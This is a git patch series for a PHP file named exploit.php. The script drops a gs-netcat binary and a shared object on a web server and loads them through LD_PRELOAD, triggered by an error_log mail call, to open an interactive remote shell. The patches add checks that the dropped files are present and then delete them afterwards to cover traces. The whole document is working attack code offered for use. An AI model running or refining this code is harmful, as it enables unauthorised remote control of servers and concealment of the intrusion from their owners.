From 5c697c2d56d7c7557a72ced2bf9235b3783021ec Mon Sep 17 00:00:00 2001
From: Cvar1984
Date: Fri, 9 Aug 2024 17:17:40 +0700
Subject: [PATCH 1/2] cleanup after execution

---
 exploit.php | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/exploit.php b/exploit.php
index d94ab89..b7dbb71 100644
--- a/exploit.php
+++ b/exploit.php
@@ -29,7 +29,7 @@ function unpack_object($object)
 echo 'gs-netcat -is ' . $secret_key;
 $absolute_path = realpath(getcwd());
-$gs_args = sprintf('-k %s/.env -il', $absolute_path);
+$gs_args = sprintf('-k %s/.env-gs -il', $absolute_path);
 file_put_contents($absolute_path . '/.env', $secret_key);
 chmod($absolute_path . '/.env', 0600);
@@ -57,3 +57,10 @@ function unpack_object($object)
 } elseif(function_exists('error_log')) {
     @error_log('a',1,'a');
 }
+
+// cleanup
+sleep(3);
+
+unlink($absolute_path . '/x64_nc');
+unlink($absolute_path . '/x64.so');
+unlink($absolute_path . '/.env-gs');
\ No newline at end of file

From b1dd02475016b26f3d4d2b161c7683dc3f75401e Mon Sep 17 00:00:00 2001
From: Cvar1984
Date: Fri, 9 Aug 2024 17:26:45 +0700
Subject: [PATCH 2/2] check shared object before execution

---
 exploit.php | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/exploit.php b/exploit.php
index b7dbb71..bc3b589 100644
--- a/exploit.php
+++ b/exploit.php
@@ -40,6 +40,17 @@ function unpack_object($object)
 file_put_contents('x64_nc', $gs_ncat_bin_x64);
 chmod('x64_nc', 0755);
+// check object
+if (filesize($absolute_path . '/x64.so') == 0) {
+    die('Unable to put shared object please compile and place it manually');
+}
+if (filesize($absolute_path . '/x64_nc') == 0) {
+    die('Unable to put elf please compile and place it manually');
+}
+if (filesize($absolute_path . '/.env-gs') == 0) {
+    die('Unable to put environment please do it manually');
+}
+
 // set environment variables
 putenv(sprintf('PRELOAD=%s', $absolute_path . '/x64_nc'));
 putenv(sprintf('LD_PRELOAD=%s', $absolute_path . '/x64.so'));
@@ -61,6 +72,6 @@ function unpack_object($object)
 // cleanup
 sleep(3);
-unlink($absolute_path . '/x64_nc');
 unlink($absolute_path . '/x64.so');
+unlink($absolute_path . '/x64_nc');
 unlink($absolute_path . '/.env-gs');
\ No newline at end of file